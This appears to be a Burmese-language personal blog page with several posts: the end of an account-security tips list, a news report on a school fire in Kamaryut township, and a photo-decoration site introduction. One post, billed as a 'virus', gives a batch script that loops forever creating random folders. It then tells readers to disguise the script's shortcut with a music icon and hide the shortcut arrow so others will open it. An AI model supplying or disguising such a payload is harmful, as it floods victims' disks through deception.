ရေးပြီး မှတ်ထားပါတယ်။ ဒါကလည်း အန္တရယ်များပါတယ်။

၈) မိမိရဲ့ အကောင့်ကို စောင့်ကြည့်ရေး
ဆိုလိုတာက အကယ်၍ Gtalk သာသုံးမယ်ဆိုရင် မိမိအကောင့်ကိုဘယ်ဆီက လာသုံးတယ်ဆိုတာကို
စစ်ဖို့ Last Activity on this account ဆိုတာပါပါတယ်.. ဒီလိုစစ်ခြင်းဖြင့်
တစ်ခြားဘယ် IP ကလာသုံးသွားတယ်ဆိုတာ သိနိုင်ပါတယ်။
နောက်တစ်ခုက မိမိရဲ့ Inbox / Outbox တွေကို စစ်ပါ ။ ထူးခြားတဲ့
အရိပ်အရောင်တွေ့က password ကိုပြောင်းပါ။

၉) မိမိသုံးသော Browser ရဲ့ Cache ကိုဖျက်ပါ
ဘယ် site သို့မဟုတ် ဘယ်ကွန်ပျူတာပဲ သုံးသည်ဖြစ်စေ တစ်ခြားသူတစ်ယောက် မိမိရဲ့
ခြေရာကို မလွယ်တကူမလိုက်နိုင်ဖို့ cache ကိုရှင်းဖို့လိုပါတယ်။ ဥပမာ IE
ဆိုရင် clicking Tools > Internet Options > Delete Cookies and
Delete Files

၁၀) နောက်ဆုံး ကွန်ပျူတာ နှင့် အင်တာနက် သတင်းကို စောင့်ကြည့်ပါ
မိမိတို့က ကွန်ပျူတာ & အင်တာနက်သုံးတာဖြစ်တဲ့အတွက် မိမိတို့ရဲ့ လုံခြုံရေးအတွက်
သတင်းထူးများကို လုံခြုံရေးဆိုင်ရာ website တွေမှာ ပုံမှန်ဖတ်ရှုပေးပါ။

Privacy ဆိုတာ အမှန်ကိုအရေးကြီးပါတယ်။ ကျွန်တော်ပြောနေကျစကားတစ်ခွန်းရှိပါတယ်။
အဲ့ဒါကတော့ အလကားရတဲ့ မေးလ်၊ အကောင့်သူများသိသွား
အရေးမကြီးဘူးလို့မမှတ်နဲ့ ဟက်ကာတွေ ခိုးတာ မိမိတို့ရဲ့ အကောင့်ကိုမဟုတ်ဘူး
မိမိတို့ရဲ့ Info ကိုခိုးတာပါ။

ဥပမာအနေနဲ့ပြောရင် ကျွန်တော့်ရဲ့ အီးလ်မေးကိုရရင် မေးလ်တစ်ခုတည်းမဟုတ်ဘူး
၎င်းထဲမှာပါတဲ့
banking/business/domain စသည်အများကြီးပါသွားပါလိမ့်မယ်။ နောက်တစ်ခုက
အဆက်အနွယ်ပါ။ ကျွန်တော့်အကောင့်ကိုသိရင် ကျွန်တော်ထိန်းချူပ်ထားတဲ့ Domain
နဲ့ Hosting ကိုသိမယ်။ ကျွန်တော်ရေးတဲ့ ဖိုရမ်ကိုသိမယ် ။ ၄င်းမှတစ်ဆင့်
ဖိုရမ်၊ domain၊ Hosting မှ အခြားသော member တွေရဲ့ User name နဲ့
password ကိုသိသွားပါလိမ့်မယ်။

ကျွန်တော့်ရဲ့လုပ်ထုံးတစ်ခုက အကယ်၍ ဖိုရမ်တစ်ခုဝင်ရင် အဲ့ဖိုရမ်ရဲ့
မိမိအပေါ်မှာ level
အနိုပ်အမြင့်ကိုကြည့်ပြီး password ကိုပေးပါတယ်။ ဆိုလိုတာက တစ်ခြား
ဖိုရမ်တွေမှာ admin123 လို့ပေးနေကျဖြစ်ရင် admin or mod အနေနဲ့ ၀င်နေတဲ့
ဖိုရမ်၊ Website၊ Hosting တွေဆိုရင် ကျွန်တော် မတူတဲ့ Password
ကိုပေးထားတတ်ပါတယ်။

ဒီလိုအကြောင်းတွေကြောင့် ကျွန်တော့်ရဲ့ သက်ဆိုင်သူကိုတောင် ကျွန်တော့်
Password မပေးပါဘူး။ မယုံကြည်လို့
မရိုးသားလို့တော့ မဟုတ်ပါဘူး။ မိမိအကောင့်တစ်ခုတည်းမဟုတ်ပါဘူး အခြား
မိမိဆက်နွယ်တဲ့သူတွေရဲ့ privacy ဆိုတာရှိပါသေးတယ်......
(ဘေးကင်းစေဖို့ ရည်၇ွယ်ပြီးပြန်လည်မျှဝေပါတယ်
Unknown at 10:58 AM 0 မှတ်ချက်ကလေးရေးပေးနော်.
Share

ကမာရွတ်မြို့နယ်ရှိ အမှတ်(၂) အခြေခံပညာအထက်တန်းကျောင်းအတွင်း မီးလောင်မှုဖြစ်ပွား





ရန်ကုန်တိုင်းဒေသကြီး၊ ကမာရွတ်မြို့နယ်ရှိ အမှတ်(၂)အခြေခံပညာကျောင်းအတွင်း မီးလောင်ကျွမ်းမှုဖြစ်စဉ်မှာ ဒီဇင်ဘာလ(၃၀)ရက်နေ့ ညနေ ၅နာရီခွဲ အချိန်ဝန်းကျင်၌ စတင်ဖြစ်ပွားခဲ့ကြောင်း သိရှိရသည်။

အဆိုပါ မီးလောင်မှုဖြစ်စဉ်ကို အမှတ်(၂)အခြေခံပညာအထက်တန်းကျောင်း၌ ညစောင့်တာဝန်အဖြစ်ထမ်းဆောင်နေသည့် အမျိုးသားတစ်ဦးမှ ညနေ ၅နာရီခွဲအချိန်တွင် စတင်မြင်တွေ့မြင်ခဲ့ကြောင်း ၄င်း၏ ပြောကြားချက်အရ သိရှိရသည်။

မီးစတင်လောင်ကျွမ်းခဲ့သည့် နေရာမှာ တေဇခန်းမဆောင်အနီးရှိ ကွန်ပြူတာ အခန်းမှ စတင်လောင်ကျွမ်းခဲ့ပြီး တေဇခန်းမဆောင်သို့ ကူးစက်၍ မီးလောင် ကျွမ်းခဲ့ကြောင်း သိရှိရသည်။

ယင်းမီးလောင်မှုကို မီးသတ်တပ်ဖွဲ့ဝင်မှ မည်သည့်နေရာမှ စတင်၍ လောင်ကျွမ်းခြင်းဖြစ်ကြောင်း အတည်မပြုသေးသော်လည်း ယခုလက်ရှိအချိန်ထိ အမှတ်(၂)အခြေခံပညာကျောင်းအတွင်းရှိ တေဇခန်းမဆောင်တစ်ခုလုံး မီးလောင်ကျွမ်းခဲ့ပြီး အဆိုပါခန်းမအနီးရှိ ကွန်ပြူတာခန်း၊ အိမ်တွင်းမှုအခန်း၊ အနုပညာခန်း၊ ပန်းချီခန်း၊ ကျန်းမာရေးခန်းနှင့် လေးထပ်ဆောင်တို့မှာ မီး ကူးစက်လောင်ကျွမ်းခဲ့ကြောင်း သိရသည်။

အဆိုပါဖြစ်စဉ်သည် ဒီဇင်ဘာလ(၃၀)ရက်နေ့ညနေ၅နာရီခွဲအချိန်ခန့်၌ စတင် လောင်ကျွမ်းခဲ့ခြင်းဖြစ်ပြီး ည (၆)နာရီ (၃၅)မိနစ်ခန့်တွင် မီးညွန့်ကို ထိန်းသိမ်းနိုင်ခဲ့ကာ ည၇နာရီ၊ မိနစ်၅၀တွင် မီးငြိမ်းသတ်နိုင်ခဲ့ကြောင်း သိရှိရသည်။ မီလောင်မှု ဖြစ်ပွားရာနေရာသို့ မီးသတ်ယာဉ် (၃၁)စီး၊ အုပ်ချုပ်မှုယာဉ် (၈)စီး လာရောက် မီးငြိမ်းသတ်ခဲ့ကြောင်း သိရှိရသည်။

မီးလောင်မှုဖြစ်စဉ်ကို ဦးစွာမြင်တွေ့ခဲ့ရသည့် အမှတ်(၂)အခြေခံပညာကျောင်း၊ ကျောင်းစောင့်ဖြစ်သူ ကိုဖိုးဇော် က " ကျွန်တော်နဲ့ ကျွန်တော့ဇနီးက ညနေ၅နာရီခွဲအချိန်လောက်က ကျောင်းအတွင်းထဲမှာ သန့်ရှင်းရေးလုပ်နေတဲ့ အချိန်မှာပဲ တေဇခန်းမဆောင်ရဲ့ ဘေးထောင့်မှာရှိတဲ့ ကွန်ပြူတာခန်းကနေပြီးတော့ မီးလောင်နေတာကို တွေ့ရတယ်။ မီးငြှိမ်းသတ်ဖို့ ဆောင်ရွက်မယ့်အချိန်မှာ မီး ညွန့်ကအရှိန်ပြင်းလာတယ်။ ကွန်ပြူတာခန်းကလည်း တံခါးပိတ်ထားတဲ့အတွက်ကြောင့်မို့လို့ ၀င်လို့မရဘူး" ဟု ၄င်း၏ မြင်တွေ့မှုကို ပြန်လည် ပြောကြားခဲ့သည်။
Unknown at 10:04 AM 0 မှတ်ချက်ကလေးရေးပေးနော်.
Share

တစ်ခဏတွင်း ဖိုင်ပေါင်းတစ်ထောင် လုပ်ကြည့်မယ် (Virus)

ဒီနည်းကို ကျွန်တော်ရေးသင့်မရေးသင့်တော်တော်လေးကို စဉ်းစားရတယ် ။ ဘာလို့ ဆိုတော့ ဒါလေးကို လုပ်မိရင် တစ်ခဏတွင်း ဖိုင်ပေါင်းတစ်ထောင်က သင့်စက်မှာ အစီအရီတက်လာလိမ့်မယ်လေ ။ စိတ်ဆင်းရဲစေတော့ နည်းပေါ့ ။ ကျွန်တော်တရားခံဖြစ်မှာလည်း ကြောက်တယ်ဗျာ ။ ဒါပေမယ့် သူငယ်ချင်းတွေက ရေးလိုက်ပါ ဆိုတော့လည်း မရေးရဲ ရေးရဲနဲ့ ရေးလိုက်ရော....ပြီးတော့ ကျွန်တော်တစ်ခုကို တွေးပြီး ရေးလိုက်တယ်ဗျာ ... အဲဒါက ဒါကို လိုက်မိပြီးတော့ စိတ်ထဲမှာ နည်းပညာကိုလေ့လာမှ ဖြစ်တော့မယ်.... ဆိုတဲ့အတွေးပေါ်လာနိုင်လို့ပဲဗျာ ။ တကယ်လို့ ဒီလိုမျိုးဖြစ်ပြီးတော့ နည်းပညာကို စိတ်ဝင်စားသွားမယ်ဆိုရင် ကျွန်တော်ရေးရကျိုးနပ်မယ်လို့ ယူဆမယ်ဗျာ....

      

          ပထမဆုံး Run box ကို ဖွင့်လိုက်ပါ ။ Window + R ကို တွဲနိပ်ပြီး ခေါ်နိုင်ပါသည် ။
အဲဒီထဲမှာ ဒီစာသားတွေကို ကူးပြီး ထည့်ပေးလိုက်ပါ ။
@echo off
:top
md %random%
goto top 

ပြီးရင်တော့ သိမ်းမယ်ဗျာ ။ သိမ်းတဲ့နေရာမှာ .bat ကို အဆုံးထားပြီး သိမ်းရပါမယ်... ရှေ့က နာမည်တော့ ကိုယ်ကြိုက်တာပေးလို့ရပါတယ် ဥပမာ 1000folders.bat ပေါ့ဗျာ ..။ ပုံကို ကြည့်ပါဦး...

Virus ပုံကိုလည်းကြည့်ပါဦး....

ကဲ ပြီးပြီ ။ ဒီတိုင်းဆို သိပ်အလုပ်မဖြစ်ဘူး  နည်းနည်းတော့ ထပ်လုပ်ဦးပေါ့ ။ ဒါမှလည်း မိမှာ :)
အဲဒီကောင့်ကို စက်တစ်နေရာရာမှာ သိမ်းထားလိုက် ။ ပြီးရင် အဲဒီကောင်ကို Right Clink နဲ့ Shortcut တစ်ခု ယူလိုက်ပါ ။ နားလည်ဘူးဆိုရင် ပုံကို ကြည့်လိုက်ပါ ။
 ကဲ Desktop မှာ ထားလိုက် ။ အဲဒီကောင်ကို ပြီးရင် နည်းနည်း မျက်စိလေးလည့်အောင် Icon ပုံလေး ပြောင်းတာပေါ့ဗျာ ။ Right Clink နဲ့ Properties ကို ရွေးလိုက် ။

ပြီးရင် Change Icon ကို နိပ်လိုက်....
ပြီး ပြောင်းဖို့ အပုံတွေ အများကြီးရှိမယ် ကြိုက်တဲ့ကောင်နဲ့သာ ပြောင်းလိုက်ဗျာ .... ကျွန်တော်တော့ သီချင်းစတိုင်နဲ့ပဲ ;)
ကဲ ခု... ဖွင့်ချင်စရာလေး ဖြစ်သွားပြီဗျာ.....
မြားပုံကိုလည်း ဖျောက်ချင် ဖျောက်လို့ရပါသေးတယ်ဗျာ ။ ဒါတော့ ကိုယ်တိုင်သာ လိုက်ရှာပေတော့... ။
ကျွန်တော်တော့ ဒါလောက်ပဲရေးပေးချင်ပါတယ် ။
Unknown at 9:53 AM 0 မှတ်ချက်ကလေးရေးပေးနော်.
Share

မိမိပုံကို စာလုံးတွေနဲ့ အလှဆင်ချင်လား ( ဝက်ဆိုဒ်မိတ်ဆက် )

မိမိတို့ရဲ့ ပုံကို အလှဆင်ချင်တယ်ဆိုရင်တော့ .... အဟမ်းအဟမ်း (ဈေးကိုင်တဲ့လေသံနဲ့)
ကျွန်တော်ကလိထားတဲ့ ပုံကိုလည်း ကြည့်ပါဦး

စမ်းချင်တယ်ဆိုရင် ------>>>  ဒီနေရာကို အရင်သွားပါ ။
အဲဒီမှာ လုပ်ဖို့ ပုံရွေးကို ရွေးပါ ။

ကဲ့ ပုံရွေးပြီးရင် Submit လိုက်ပါ ။ ပုံကြမ်း မလှတလှထွက်လာလိမ့်မယ် ။ မတင့်သိမ်နဲ့ဦး ဘော်ဒါ :P
နာမည်ထည့်ပြီး Submit လိုက် ။ နောက်တစ်ခါ ပြီးရင်တော့ လာပြီကောင်းခန်း :)

အဲဒီမှာ ကြိုက်တာလေးတွေးရွေးပြီး ဒေါင်းလိုက်ပေါ့ ။ ကျွန်တော်တော့ Capture လိုက်တာပဲ :)  ။    ။
အဆင်ပြေကြပါစေဗျာ
Unknown at 9:51 AM 0 မှတ်ချက်ကလေးရေးပေးနော်.
Share
‹
›
Home
View web version
မောင်သက်နိုင်

Powered by Blogger. designed by mythem.es. converted to Blogger by New Blogger Themes.